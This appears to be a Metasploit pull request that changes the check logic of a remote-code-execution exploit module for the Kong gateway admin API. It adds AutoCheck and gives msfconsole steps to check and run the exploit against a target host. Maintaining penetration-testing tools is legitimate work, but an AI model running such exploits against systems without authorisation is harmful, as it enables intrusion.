### PR TITLE
Update Kong gateway admin API rce check support

### DIFF
--- a/modules/exploits/multi/http/kong_gateway_admin_api_rce.rb
+++ b/modules/exploits/multi/http/kong_gateway_admin_api_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -135,15 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
     path = normalize_uri(target_uri.path, @rand_name)
     response = send_request_cgi({ 'rport' => rport, 'rhost' => rhost, 'uri' => path })
     return CheckCode::Unknown unless response
-    return CheckCode::Safe unless response.get_json_document['message'] == 'no Route matched with those values'
 
     CheckCode::Appears
   end
 
   def exploit
     @rand_name = rand_text_alphanumeric(10)
-    @route_cleanup_required = false
-    fail_with(Failure::UnexpectedReply, 'Admin API not detected') unless check == CheckCode::Appears
     @route_cleanup_required = true
     create_route
     vprint_good("Created route #{@rand_name}")


### PR DESCRIPTION
This module's check method didn't take into consideration the possibility of all routes being being forwarded to a service. Previously the check method was relying on kong's 404 functionality to ensure that the public site was running kong. This pull request loosens the rules a bit. Additionally it's updated to use the autocheck functionality, so users can override the check method in the future if need be.

Note, the the module could potentially verify http headers, example: `Server: kong/2.5.0\r\nX-Kong-Admin-Latency: 9`, if we wanted to ensure the site is kong of some type. Although that could still give false negatives

## Verification

Configure a vulnerable kong environment:
https://github.com/rapid7/metasploit-framework/blob/12b7e613c5e7fbd91e898e0a33264ff600c91520/documentation/modules/exploit/multi/http/kong_gateway_admin_api_rce.md#configuring-a-vulnerable-environment

Add a service and route:
```
curl -v -i -X POST http://127.0.0.1:8001/services --data name=my_service --data url='http://mockbin.org'
curl -v -i -X POST http://127.0.0.1:8001/services/my_service/routes --data 'paths[]=/'
```

Verify the behavior the check method now works, and rce works:
```
./msfconsole
use exploit/multi/http/kong_gateway_admin_api_rce
set rhosts x.x.x.x
check
run
```